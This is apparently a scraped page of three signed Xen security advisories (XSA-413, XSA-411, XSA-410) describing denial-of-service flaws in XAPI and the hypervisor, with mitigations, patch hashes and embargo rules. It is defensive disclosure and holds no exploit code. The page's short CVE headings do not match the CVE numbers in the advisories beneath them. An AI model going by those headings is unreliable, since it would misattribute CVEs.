agreed Security Policy: http://www.xenproject.org/security-policy.html -----BEGIN PGP SIGNATURE----- iQFABAEBCAAqFiEEI+MiLBRfRHX6gGCng/4UyVfoK9kFAmNFS/cMHHBncEB4ZW4u b3JnAAoJEIP+FMlX6CvZKqsIAMobhnQXNUKRUiS1TFrV5NhbUdx0r0PHX3alf3r0 ZUk3mQyq3lKK6MkXB0bpkgq95fv6dw9SIriPRZdivVBK7Yb2VBImdZ/YyXoU5JWN 3EPO8Svxzm8WCntk9smjwNix2SByWSVjQfROjrrgihWLbX4n0IQkOLFlvVgllJmK ETc0q3bMKEODH7+kkmrTmT+nomlHbuq7HHAZk0jyw/hVs1JdRMN9TXBBdLjLOYFe /hsDiLWwK51L7ehPZB4d/+rLQYo27chGwNGQwDDXXiWWhMmXJJCO3MhrB4NEt0JE P4DAkmh2OXh6QyuZPTH48ADbAdL7ecq2atrM6HD2oulwFCI= =/zM/ -----END PGP SIGNATURE-----

CVE-2022-33747

XAPI open file limit DoS It is possible for an unauthenticated client on the network to cause XAPI to hit its file-descriptor limit. This causes XAPI to be unable to accept new requests for other (trusted) clients, and blocks XAPI from carrying out any tasks that require the opening of file descriptors.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Xen Security Advisory CVE-2022-33749 / XSA-413 version 2 XAPI open file limit DoS UPDATES IN VERSION 2 ==================== Public release. ISSUE DESCRIPTION ================= It is possible for an unauthenticated client on the network to cause XAPI to hit its file-descriptor limit. This causes XAPI to be unable to accept new requests for other (trusted) clients, and blocks XAPI from carrying out any tasks that require the opening of file descriptors. IMPACT ====== An attacker is capable of blocking connections to the XAPI HTTP interface, and also interrupt ongoing operations, causing a XAPI toolstack Denial of Service. Such DoS would also affect any guests that require toolstack actions. VULNERABLE SYSTEMS ================== All versions of XAPI are vulnerable. Systems which are not using the XAPI toolstack are not vulnerable. MITIGATION ========== Not exposing to untrusted clients the network interface XAPI is listening on will prevent the issue. RESOLUTION ========== Applying the attached patches resolves this issue. xsa413/xsa413-\*.patch Xapi master $ sha256sum xsa413\*/\* 63f72af7a92944700318add5cc200160ff7f834b6d304dd22441fa2de74c7b83 xsa413/xsa413-1.patch 6fbcbfb1915ebc4a726374d94e050406d8f1d52c3cb9afc06bcf7cec9e5a19c8 xsa413/xsa413-2.patch c41de04ff2b63756e693c6c75ec4d7206a88db06c1da0b263c9d0644da90ef8b xsa413/xsa413-3.patch 6ee2dc09f6c5f64ce9627e9b4e314237817f7c0c2eebe30a2c83709d1faf0050 xsa413/xsa413-4.patch 360a5099ece45118488706acd76b6da3ca8e6f107cee24586dbf6ec7f5858aeb xsa413/xsa413-5.patch cc79e086affcfd784ab8cd38e1d0acd6adb241c24141f3409161e417cc314b28 xsa413/xsa413-6.patch $ DEPLOYMENT DURING EMBARGO ========================= Deployment of the patches and/or mitigations described above (or others which are substantially similar) is permitted during the embargo, even on public-facing systems with untrusted guest users and administrators. But: Distribution of updated software is prohibited (except to other members of the predisclosure list). Predisclosure list members who wish to deploy significantly different patches and/or mitigations, please contact the Xen Project Security Team. -----BEGIN PGP SIGNATURE----- iQFABAEBCAAqFiEEI+MiLBRfRHX6gGCng/4UyVfoK9kFAmNFTAEMHHBncEB4ZW4u b3JnAAoJEIP+FMlX6CvZmIMH/RBAGOrAi8NI7BBeGHwMW7WqyMfT6mTVUFkb2z9z ZFtvPFvim5AobCUpAKFtUAWpSQoUEEPyTO83C2VDe9jQC37mRo/qAduX7wj8oaJv Dq+QFECP95bsfmu0SwKYL7ZW+3lLxDVwtp88z4P/H/U0VYqG+bNrR569znBbn0wL p7EKQG5A4PS0nLg8ehnxjwuKCn0dCgUIZibh3AIMOUDTFY/apVeDFbX7bKIoQgLV /0B18MevryxqSRe3QpL2WW/kRGLLKF7i5SA7nAbOPMzPWHOLNDZb+b+Hq7/eYwzI a2+6yUcBkWAqyi9M3fXkhslySA/WqLdPXBIkd47zZS9rIuU= =Ih6z -----END PGP SIGNATURE-----

CVE-2022-33749

lock order inversion in transitive grant copy handling As part of XSA-226 a missing cleanup call was inserted on an error handling path. While doing so, locking requirements were not paid attention to. As a result two cooperating guests granting each other transitive grants can cause locks to be acquired nested within one another, but in respectively opposite order. With suitable timing between the involved grant copy operations this may result in the locking up of a CPU.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Xen Security Advisory CVE-2022-33748 / XSA-411 version 3 lock order inversion in transitive grant copy handling UPDATES IN VERSION 3 ==================== Public release. ISSUE DESCRIPTION ================= As part of XSA-226 a missing cleanup call was inserted on an error handling path. While doing so, locking requirements were not paid attention to. As a result two cooperating guests granting each other transitive grants can cause locks to be acquired nested within one another, but in respectively opposite order. With suitable timing between the involved grant copy operations this may result in the locking up of a CPU. IMPACT ====== Malicious or buggy guest kernels may be able to mount a Denial of Service (DoS) attack affecting the entire system. VULNERABLE SYSTEMS ================== Xen versions 4.0 and newer are vulnerable. Xen versions 3.4 and older are not vulnerable. Only guests with access to transitive grants can exploit the vulnerability. In particular, this means that: \* ARM systems which have taken the XSA-268 fix are not vulnerable, as Grant Table v2 was disabled for other security reasons. \* All systems with the XSA-226 fixes, and booted with \`gnttab=max-ver:1\` or \`gnttab=no-transitive\` are not vulnerable. \* From Xen 4.16, the maximum grant table version can be controlled on a per-domain basis. For the xl toolstack, the vulnerability does not manifest if either: 1) Every guest has \`max\_grant\_version=1\` in their configuration file, or 2) The global xl.conf has \`max\_grant\_version=1\`, and no guests have the default overridden by selecting \`max\_grant\_version=2\`. Only multiple cooperating guests can exploit the vulnerability. MITIGATION ========== Disallowing the use of transitive grants either via the \`gnttab=no-transitive\` Xen command line option, or by disabling grant interface version 2 altogether via the \`gnttab=max-ver:1\` Xen command line option or the xl controls as mentioned above will avoid the vulnerability. CREDITS ======= This issue was discovered by Jan Beulich of SUSE. RESOLUTION ========== Applying the appropriate attached patch resolves this issue. Note that patches for released versions are generally prepared to apply to the stable branches, and may not apply cleanly to the most recent release tarball. Downstreams are encouraged to update to the tip of the stable branch before applying these patches. xsa411.patch xen-unstable - Xen 4.15.x xsa411-4.14.patch Xen 4.14.x - 4.13.x $ sha256sum xsa411\* 0802e2e4e9d03c82429a710bbb783cee2fded52d29b1d969b97c680d30c3ac57 xsa411.patch 8473f2ee34562298c5174f0a5b3c64c561a945333aab675845093ad23250d1cf xsa411-4.14.patch $ DEPLOYMENT DURING EMBARGO ========================= Deployment of the patches described above (or others which are substantially similar) is permitted during the embargo, even on public-facing systems with untrusted guest users and administrators. But: Distribution of updated software is prohibited (except to other members of the predisclosure list). Predisclosure list members who wish to deploy significantly different patches and/or mitigations, please contact the Xen Project Security Team. HOWEVER, deployment of the mitigations is NOT permitted (except where all the affected systems and VMs are administered and used only by organisations which are members of the Xen Project Security Issues Predisclosure List). Specifically, deployment on public cloud systems is NOT permitted. This is because it is a guest visible change which will draw attention to the issue. -----BEGIN PGP SIGNATURE----- iQFABAEBCAAqFiEEI+MiLBRfRHX6gGCng/4UyVfoK9kFAmNFTAAMHHBncEB4ZW4u b3JnAAoJEIP+FMlX6CvZPsQH/1JCqscbx49QygGVEnq43C97HQpcoZcUNJGwGjBJ Li0SXejxd3iWsYsFlMAgmacHIjevEGv318JJLSM21hBULGe85cc6QatpWS0VWrBc tQVbDIgqNRv42gJCtf1dLF0TnlTZ6p3wiqfsxEYBn1zlEhe2ZEMpY8an4707O32d nQ90JFh44QJXx6HMZD3pEw2g1+4pMDu9yDUp/Yc3YmxYnXmPW6KE7iMmGkLLGigI GfiTI4FA/BDVIZkjPErwG7pyXmp2sdtVkv5o/cg7YTOrLzeBmegdyUvzuXkizJ2F PQnc1rgS/vXPkC62cy6fmLkeAf0dQhq6KBuxW3N8s2fXRXk= =/bRo -----END PGP SIGNATURE-----

CVE-2022-33748

P2M pool freeing may take excessively long The P2M pool backing second level address translation for guests may be of significant size. Therefore its freeing may take more time than is reasonable without intermediate preemption checks. Such checking for the need to preempt was so far missing.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Xen Security Advisory CVE-2022-33746 / XSA-410 version 3 P2M pool freeing may take excessively long UPDATES IN VERSION 3 ==================== Public release. ISSUE DESCRIPTION ================= The P2M pool backing second level address translation for guests may be of significant size. Therefore its freeing may take more time than is reasonable without intermediate preemption checks. Such checking for the need to preempt was so far missing. IMPACT ====== A group of collaborating guests can cause the temporary locking up of a CPU, potentially leading to a Denial of Service (DoS) affecting the entire host. VULNERABLE SYSTEMS ================== All Xen versions are vulnerable. x86 HVM and PVH guests as well as Arm guests can trigger the vulnerability. x86 PV guests cannot trigger the vulnerability. MITIGATION ========== Running only PV guests will avoid the vulnerability. CREDITS ======= This issue was discovered by Julien Grall of Amazon. RESOLUTION ========== Applying the appropriate set of attached patches resolves this issue. Note that patches for released versions are generally prepared to apply to the stable branches, and may not apply cleanly to the most recent release tarball. Downstreams are encouraged to update to the tip of the stable branch before applying these patches. xsa410/xsa410-??.patch xen-unstable xsa410/xsa410-4.16-??.patch Xen 4.16.x - 4.15.x xsa410/xsa410-4.14-??.patch Xen 4.14.x xsa410/xsa410-4.13-??.patch Xen 4.13.x $ sha256sum xsa410\* xsa410\*/\* 70b2f2c880b30094c9bdbd3ae4b20b32acfc8daf94d5add5884998ff20ffc0e7 xsa410.meta 632f4d71bc9dfc5ddcf649b1e484a918b4cb3d270dedad3b904bf4552318ae0d xsa410/xsa410-01.patch a2c1e6871a76b9d0c7f54b5557c6d0e1a02423bca5b27354aa7e872b0016047e xsa410/xsa410-02.patch 61b8c71ad199dfa9762e739a592aa0a7f3b79d42e88d80a9589a993c768352be xsa410/xsa410-03.patch fb11b3d730bb665add2447b8f2258755604ce51e0ccc0731cddd938a538b051f xsa410/xsa410-4.13-01.patch ce5e780fdd162a1961fb0d51ccd7db8c3b2cedcee444ee3a58569bd8bbcfd6e8 xsa410/xsa410-4.13-02.patch 33514a6bf40d6c73fa7ca064b3e0401048f87eecbd007601bca6943b58f5c4b5 xsa410/xsa410-4.13-03.patch af7d5eeda27e789c91e39b58110b25b668ecc241ed87bf4d75d9ff2bf647c660 xsa410/xsa410-4.13-04.patch 972e95787d635056bb0476bff990af0957d9669b4b4948975a74ed085b9fdc38 xsa410/xsa410-4.13-05.patch 4587ff1246f1ea59053e76cdded0e42aba8e747123c8b37b7fe4e03f39d3a447 xsa410/xsa410-4.13-06.patch 99a2a83ea89aa0a79c3cd938917d6b7de1e7e52ec744fb2e0ed1ed2a577cb203 xsa410/xsa410-4.13-07.patch b36cc0d96111dbf65b7fefbce5fe9c5fe737dca24453f10f76253ce5bdcbb37d xsa410/xsa410-4.13-08.patch b548a1ba8082e5dbb35943bbacc5391766343c373c6edd2eb96d430cacdac00b xsa410/xsa410-4.13-09.patch 9fae7cf66cb298737ad5f021c349291ec84f8de83d02a9b814967fb97b85ad1f xsa410/xsa410-4.13-10.patch 0b91fcfc0a29428cfc06f4f1ddb01f5d1e7f144eae05635f2e9ef46dd7b33f0a xsa410/xsa410-4.14-01.patch a7a7e7e9529e91454035ad468c46faae34638be1f5f0694e1fe352c6c1acff06 xsa410/xsa410-4.14-02.patch 75bb2296a9f8adeb0ae3fc330f158614aab94a9263aba99730fe31d71be93d62 xsa410/xsa410-4.14-03.patch 8ad3dc1957fdb440e0bbd3b8e17286361ddfa6bb748ba6d48cc85ca8e88862ba xsa410/xsa410-4.14-04.patch 5aba547158d8f182eb8a148a03c3c69741d264b568a80b349c34b99e36e75647 xsa410/xsa410-4.14-05.patch 5b343f47ce34c53a0cf300a05ccd6898f695e62ced4b0f14d64c9947c8c17250 xsa410/xsa410-4.14-06.patch d34f3107061f13fdd1338d78544584d3509f8f7dabde78027f308c934cfeeb10 xsa410/xsa410-4.14-07.patch 8ccce0e109f6e0957643a04c822b7637b2cc7094ab73c4b19898657c05282f76 xsa410/xsa410-4.14-08.patch ca3116eb10b4ea29a4e5ce97a40d0f504418a8cd890fa49fb4ddf6c3acba9a9b xsa410/xsa410-4.14-09.patch ec1ad7529e6406f7fff9ebe35caf64419e360feadc9fae4ea679bff88238eefa xsa410/xsa410-4.14-10.patch 27857174e10917e02c6b9c6b8c29d5510c308035462a9a18bcdfebcef8c1e7af xsa410/xsa410-4.16-01.patch 7fc330e398e99023f9875004409ae4cb3943b15338662c242887f593d909e271 xsa410/xsa410-4.16-02.patch 9a72aaef6a65ec984022590c5e1bb39527873df4607604746d0a0b91636271d8 xsa410/xsa410-4.16-03.patch 4dffbb2e5933c18426e6ce0cbba94c42637f59b8cec03aad2bfc54d81c49d3e3 xsa410/xsa410-4.16-04.patch 2e5d91e3e5e0e7a294caada1399e017487063642bbb42bddfa5169db6faab37e xsa410/xsa410-4.16-05.patch 8174d9ed5f633f5a043084bf0cfb08211173f1afbfc5240c306bffa69c883595 xsa410/xsa410-4.16-06.patch b78792bd0d51a8e18d570d225df556f2099272cab00f1cb95bbbb4c08d299ce1 xsa410/xsa410-4.16-07.patch 1f3f14bf3091e685cf6ac530baf7bd060586cf3db330ba1218d1048eb672d6eb xsa410/xsa410-4.16-08.patch 63af35d559156436276967c94b3402982914b0fdd77187ff5b0bbf3dda356589 xsa410/xsa410-4.16-09.patch 85e8da807225df97583f5331491f29ecea059ce770c59a1a898a4b19b838f0c1 xsa410/xsa410-4.16-10.patch 6cf86d574ff45719659ed23af352fdc64d6563434057b733ac46ec6d5c758a3f xsa410/xsa410-04.patch 296d38e69eebab2985cdab70419ca5fd73380d94b35c96fa7f6820fead59bf95 xsa410/xsa410-05.patch e590762c70faad493b4e95c9f747ad9c3b313233f1b0aba3e81df5f40565cc51 xsa410/xsa410-06.patch 28164010d988fb590c7b22ef7f3571142660ec975ee8709f28fe310f220f7b08 xsa410/xsa410-07.patch 0ad43b452e5aef2657f311b6fa2fbc1eb07702d08c78878b1e614c573606feeb xsa410/xsa410-08.patch 04f02d9b06f74a8921557196b39c2cf3dd8fd7bf0c1f350d0c55d8d49187e9a7 xsa410/xsa410-09.patch a67ae39583867ed5d3900c4b45e2e32e9ac4ec58298c6508cedb273e9b7caf4b xsa410/xsa410-10.patch $ DEPLOYMENT DURING EMBARGO ========================= Deployment of the patches and/or mitigations described above (or others which are substantially similar) is permitted during the embargo, even on public-facing systems with untrusted guest users and administrators. But: Distribution of updated software is prohibited (except to other members of the predisclosure list). Predisclosure list members who wish to deploy significantly different patches and/or mitigations, please contact the Xen Project Security Team. (Note: this during-embargo deployment notice is retained in post-embargo publicly released Xen Project advisories, even though it is then no longer applicable. This is to enable the community to have oversight of the Xen Project Security Team's decisionmaking.) For more information about permissible uses of embargoed information, consult the Xen Project community's agreed Security Policy: http://www.xenproject.org/security-policy.html -----BEGIN PGP SIGNATURE----- iQFABAEBCAAqFiEEI+MiLBRfRHX6gGCng/4UyVfoK9kFAmNFS/4MHHBncEB4ZW4u b3JnAAoJEIP+FMlX6CvZFn8H/AlU50r9Lk0QaxVbvuKVir3rVgP+QURgVeHMTcuj UbNpjasPjQMbT9vzTPtIN+b59J0FwhWWZRIcZhYX6sPC/L9eAomUiFnVOe9Jmyec cv0gpn/fWum850A9/cZ+F3wNNmgbHcm+uLvCWM11vO79kUMzKmCeDGguU5cgbmBo hiNNL/mUEnu5QQn+jXolFCCA+CzlSJLg+tJwZn0il6dIf7z9d2yAxJRMUHF8s/c3 d23+6kTxLkfdnkGuwxkEVcSCaBN6YCGPaUy4AaQYzqPun/hcqGCsXCgK7X+iJIxq 36LWZLuqwAL80CQzEnMkgBNpqyQiudEwbZnBSMt0nzctg1g= =EdsG -----END PGP SIGNATURE-----

Tag

#redis